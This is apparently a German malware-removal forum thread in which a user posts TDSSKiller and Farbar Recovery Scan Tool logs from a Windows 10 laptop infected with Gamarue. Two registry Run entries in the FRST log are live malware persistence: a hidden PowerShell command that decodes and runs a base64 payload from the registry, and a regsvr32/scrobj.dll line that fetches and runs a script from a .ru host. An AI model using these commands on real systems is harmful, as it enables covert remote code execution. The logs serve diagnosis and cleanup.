21:37:36.0454 0x1ac0 [ 2E50A379A8E4F6C5D85E87C26C08D329, ADA0C344FE58A3772FFF7417268160E488741C5B2F08CA12ED587AB7F75756F6 ] xinputhid C:\WINDOWS\System32\drivers\xinputhid.sys
21:37:36.0470 0x1ac0 xinputhid - ok
21:37:36.0548 0x1ac0 [ D071942124D71F26546B8B11774EB867, 2496760FFB97D5CEB2AF5D91490DDE630C0BD723F0C7488BCC7247490F11FF34 ] ZeroConfigService C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
21:37:36.0626 0x1ac0 ZeroConfigService - ok
21:37:36.0626 0x1ac0 ================ Scan global ===============================
21:37:36.0641 0x1ac0 [ EEA8447A2E39A39F66C74BA66C421F92, 7FFC5294E0D0438E7450ED36947AB04D0C84DF4E1C9F2D49340D3BA586FFFAB2 ] C:\WINDOWS\system32\basesrv.dll
21:37:36.0641 0x1ac0 [ A5AE05D3674CBA5DD28C5580E238B059, 5298CF9CEB84FBDC7CAD9969CAFE7D9FFFCA625D50F8BDF877FCEAE8426375F7 ] C:\WINDOWS\system32\winsrv.dll
21:37:36.0641 0x1ac0 [ 7DD72CBE412C9567661F4B1CE9631FC1, 8D914805CBDAF448C8C132C4C3FEB1D90804F4F485180F7364A75EC5655A4DDB ] C:\WINDOWS\system32\sxssrv.dll
21:37:36.0657 0x1ac0 [ 800D00D1A7ADA9E341CACDF287347584, 70AD5A458203B35F227F3F6B4783D00424C96AA9E29DB3090CEC8C00E62CD8E5 ] C:\WINDOWS\system32\services.exe
21:37:36.0673 0x1ac0 [ Global ] - ok
21:37:36.0673 0x1ac0 ================ Scan MBR ==================================
21:37:36.0673 0x1ac0 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
21:37:36.0798 0x1ac0 \Device\Harddisk0\DR0 - ok
21:37:36.0798 0x1ac0 ================ Scan VBR ==================================
21:37:36.0813 0x1ac0 [ B079ED7D1DEFA495A022B775C0C0E9A5 ] \Device\Harddisk0\DR0\Partition1
21:37:36.0813 0x1ac0 \Device\Harddisk0\DR0\Partition1 - ok
21:37:36.0813 0x1ac0 [ B0DD3A3B74D54FCB465D830A8FB4417A ] \Device\Harddisk0\DR0\Partition2
21:37:36.0813 0x1ac0 \Device\Harddisk0\DR0\Partition2 - ok
21:37:36.0829 0x1ac0 ================ Scan generic autorun ======================
21:37:36.0829 0x1ac0 SecurityHealth - ok
21:37:36.0907 0x1ac0 [ 2F41FE54CD72C5A4CC4785D6ED7E7E88, 384DF6C5B5BFAAE20F972335CFD84785E83881C030FDA68A16D542D0CAD8D855 ] C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
21:37:37.0001 0x1ac0 NvBackend - ok
21:37:37.0079 0x1ac0 [ 555ED8FE114EF3A2728625991DA64759, CF313C155FFB47304F2E06D68C62CEFF783D890B2331BE6F7B131B614EAFD1F3 ] C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
21:37:37.0141 0x1ac0 Dropbox - ok
21:37:37.0157 0x1ac0 [ 5B6E8E09BE6401A7E022F52FDFCB2FF8, 471C556CF9405BBB380A8CEFE945C126B954B7C94F79CC72441B51F80141FC5E ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
21:37:37.0173 0x1ac0 SunJavaUpdateSched - ok
21:37:37.0204 0x1ac0 [ 9233EE8EF479551CBE721B7523A8CF45, 8A6FA3DFC059FA858E90430CDE9CD65BB403D5F4B0D4A2A03FE711D253E1AAF4 ] C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe
21:37:37.0235 0x1ac0 ADSKAppManager - ok
21:37:37.0235 0x1ac0 [ 085772CDE3100F6E82CC3469B82682FA, EE48A7FCE3A41DD7D3F54F1B873F0350F60A32AA37568F83A48BB0B2C1E66E86 ] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe
21:37:37.0251 0x1ac0 IMSS - ok
21:37:37.0735 0x1ac0 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe
21:37:38.0251 0x1ac0 OneDriveSetup - ok
21:37:38.0694 0x1ac0 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe
21:37:39.0104 0x1ac0 OneDriveSetup - ok
21:37:39.0151 0x1ac0 [ BE8FFEBE1C4B5E18A56101A3C0604EA0, D2434E607451A4D29D28F43A529246DC81D25A2FAE9C271E28C55452C09A28A5 ] C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
21:37:39.0183 0x1ac0 {C2956868-62F6-438A-A9BC-12CB233D69BF} - ok
21:37:39.0183 0x1ac0 COM+ - ok
21:37:39.0657 0x1ac0 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe
21:37:40.0081 0x1ac0 OneDriveSetup - ok
21:37:40.0112 0x1ac0 [ 9203CEE59C720D1D4BB9A97E4DE4152D, 55743BBED85C3EDB764F30648F23951FE8C76FC4984216596306F4E453D0CCB5 ] C:\Program Files (x86)\Windows Mail\wab.exe
21:37:40.0128 0x1ac0 WAB Migrate - ok
21:37:40.0128 0x1ac0 Waiting for KSN requests completion. In queue: 283
21:37:41.0151 0x1ac0 Waiting for KSN requests completion. In queue: 283
21:37:42.0182 0x1ac0 AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.11.15063.332 ), 0x61100 ( enabled : updated )
21:37:42.0214 0x1ac0 Win FW state via NFP2: enabled ( trusted )
21:37:42.0339 0x1ac0 ============================================================
21:37:42.0339 0x1ac0 Scan finished
21:37:42.0339 0x1ac0 ============================================================
21:37:42.0354 0x0d38 Detected object count: 0
21:37:42.0354 0x0d38 Actual detected object count: 0
|
|
04.07.2017, 20:51
| #12 |
| | Windows 10 - Gamarue Schritt 2: Code:
ATTFilter Farbar Recovery Scan Tool (x64) Version: 03-07-2017 01
durchgeführt von ararat (04-07-2017 21:39:59)
Gestartet von C:\Users\ararat\Desktop
Start-Modus: Normal
================== Datei-Suche: "msiexec.exe
" =============
C:\Windows\WinSxS\x86_microsoft-windows-installer-executable_31bf3856ad364e35_10.0.15063.0_none_fe76b282068b2ad7\msiexec.exe
[2017-03-18 22:58][2017-03-18 22:58] 0059392 _____ (Microsoft Corporation) 98EEBF39B025339CF12672030777707D [Datei ist digital signiert]
C:\Windows\WinSxS\amd64_microsoft-windows-installer-executable_31bf3856ad364e35_10.0.15063.0_none_5a954e05bee89c0d\msiexec.exe
[2017-03-18 22:57][2017-03-18 22:57] 0066048 _____ (Microsoft Corporation) BCEC1D69554D9DFC82E599B74ABC9963 [Datei ist digital signiert]
C:\Windows\SysWOW64\msiexec.exe
[2017-03-18 22:58][2017-03-18 22:58] 0059392 _____ (Microsoft Corporation) 98EEBF39B025339CF12672030777707D [Datei ist digital signiert]
C:\Windows\System32\msiexec.exe
[2017-03-18 22:57][2017-03-18 22:57] 0066048 _____ (Microsoft Corporation) BCEC1D69554D9DFC82E599B74ABC9963 [Datei ist digital signiert]
====== Ende von Suche ======
Schritt 3: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 03-07-2017 01
durchgeführt von ararat (Administrator) auf ARARAT-NOTEBOOK (04-07-2017 21:41:45)
Gestartet von C:\Users\ararat\Desktop
Geladene Profile: ararat (Verfügbare Profile: ararat & DefaultAppPool)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files\SRWare Iron (64-Bit)\chrome.exe" -- "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
() C:\Windows\System32\nvwmi64.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(WIBU-SYSTEMS AG) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Synaptics Incorporated) C:\Windows\System32\valWbioSyncSvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
() C:\Windows\System32\nvwmi64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynFP\Shared\SensorDBSynch.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tposd.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Synaptics) C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.410_none_9e914f9d2d85dacb\TiWorker.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1804432 2015-12-22] (NVIDIA Corporation)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3486520 2017-06-26] (Dropbox, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [477064 2013-12-22] (Autodesk Inc.)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe [1178912 2016-02-25] (Intel Corporation)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [{C2956868-62F6-438A-A9BC-12CB233D69BF}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BPMJBABA').nhnPLmKgFtez)));
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.39slxu3bw.ru/deploy.xml scrobj.dll
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2016-02-23]
ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Netzwerk Server.lnk [2016-02-23]
ShortcutTarget: Netzwerk Server.lnk -> C:\Program Files (x86)\WIBUKEY\Server\WkSvMgr.exe (WIBU-SYSTEMS AG)
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{870c603a-60f8-4e24-9690-e4821fe96d21}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e862264f-fb30-45d1-a3f9-1bf499d21b67}: [DhcpNameServer] 192.168.2.1
Internet Explorer:
==================
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.netflix.com/
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2016-02-23] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2016-02-23] (Oracle Corporation)
FireFox:
========
FF DefaultProfile: pnaz2so4.default
FF ProfilePath: C:\Users\ararat\AppData\Roaming\Mozilla\Firefox\Profiles\pnaz2so4.default [2016-03-28]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [49992 2017-06-26] (Dropbox, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373744 2016-11-02] (Intel Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [57160 2017-06-05] (Lenovo Group Limited)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [974632 2016-02-19] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [209184 2016-02-25] (Intel Corporation)
R2 Lenovo Instant On; C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe [3124808 2017-04-28] (Lenovo Group Limited)
R2 LPlatSvc; C:\WINDOWS\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-06-02] (Lenovo)
S4 McNeelUpdate; C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [68192 2013-12-07] (Robert McNeel & Associates)
S3 mi-raysat_3dsmax2015_64; C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe [86016 2011-09-15] () [Datei ist nicht signiert]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2017-02-13] ()
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-01] (NVIDIA Corporation)
R2 NVWMI; C:\Windows\system32\nvwmi64.exe [3180176 2015-12-22] ()
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
S3 SSSvc; C:\Program Files (x86)\SmartSense\SSSvc.exe [124752 2016-03-15] (Lenovo)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [259176 2016-10-03] (Synaptics Incorporated)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10351856 2016-12-15] (TeamViewer GmbH)
R2 valWBFPolicyService; C:\WINDOWS\system32\valWBFPolicyService.exe [86544 2016-07-13] (Synaptics Incorporated)
R2 valWbioSyncSvc; C:\WINDOWS\system32\valWbioSyncSvc.exe [56848 2016-07-13] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3743648 2017-02-13] (Intel® Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 blackberryncm; C:\WINDOWS\System32\drivers\blackberryncm6_AMD64.sys [36360 2016-04-06] (BlackBerry)
R3 e1dexpress; C:\WINDOWS\system32\DRIVERS\e1d62x64.sys [519680 2015-12-08] (Intel Corporation)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [244744 2017-04-13] (Intel Corporation)
R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-06-09] (Intel Corporation)
S3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw02.sys [3422472 2015-12-25] (Intel Corporation)
R3 Netwtw04; C:\WINDOWS\system32\DRIVERS\Netwtw04.sys [7630072 2017-03-21] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation)
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [423128 2013-07-24] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51296 2016-10-03] (Synaptics Incorporated)
R1 SMIDriver; C:\WINDOWS\system32\DRIVERS\smi.sys [39488 2016-07-13] (Synaptics Incorporated)
R3 SPUVCbv; C:\WINDOWS\System32\Drivers\SPUVCbv64.sys [749640 2016-07-01] (Sunplus Innovation Technology Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-07-04 21:41 - 2017-07-04 21:42 - 00015633 _____ C:\Users\ararat\Desktop\FRST.txt
2017-07-04 21:39 - 2017-07-04 21:40 - 00001140 _____ C:\Users\ararat\Desktop\Search.txt
2017-07-04 21:39 - 2017-07-04 21:39 - 00000000 ____D C:\Users\ararat\Desktop\FRST-OlderVersion
2017-07-04 21:35 - 2017-07-04 21:39 - 00283900 _____ C:\TDSSKiller.3.1.0.15_04.07.2017_21.35.13_log.txt
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Downloads\tdsskiller.exe
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Desktop\tdsskiller.exe
2017-07-04 09:44 - 2017-07-04 09:44 - 00000000 ____H C:\ProgramData\cm-lock
2017-07-03 23:53 - 2017-07-03 23:56 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2017-07-02 23:17 - 2017-07-04 21:40 - 00000000 ____D C:\Users\ararat\Desktop\Troja
2017-07-02 20:58 - 2017-07-04 21:41 - 00000000 ____D C:\FRST
2017-07-02 20:45 - 2017-07-04 21:39 - 02436096 _____ (Farbar) C:\Users\ararat\Desktop\FRST64.exe
2017-07-02 20:37 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Downloads\FRST64.exe
2017-06-29 23:31 - 2017-06-29 23:32 - 00000000 ____D C:\Users\ararat\Desktop\3D Druck
2017-06-27 22:23 - 2017-06-27 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-06-27 21:01 - 2017-06-27 21:01 - 00000000 ____D C:\Users\ararat\AppData\Local\DBG
2017-06-26 12:27 - 2017-06-26 12:27 - 00049992 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2017-06-18 10:32 - 2017-06-18 10:32 - 02373944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WudfUpdate_01011.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 12:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-06-14 20:30 - 2017-06-03 12:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-06-14 20:30 - 2017-06-03 12:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-06-14 20:30 - 2017-06-03 12:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2017-06-14 20:30 - 2017-06-03 12:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-06-14 20:30 - 2017-06-03 12:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 12:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-06-14 20:30 - 2017-06-03 12:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-06-14 20:30 - 2017-06-03 12:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
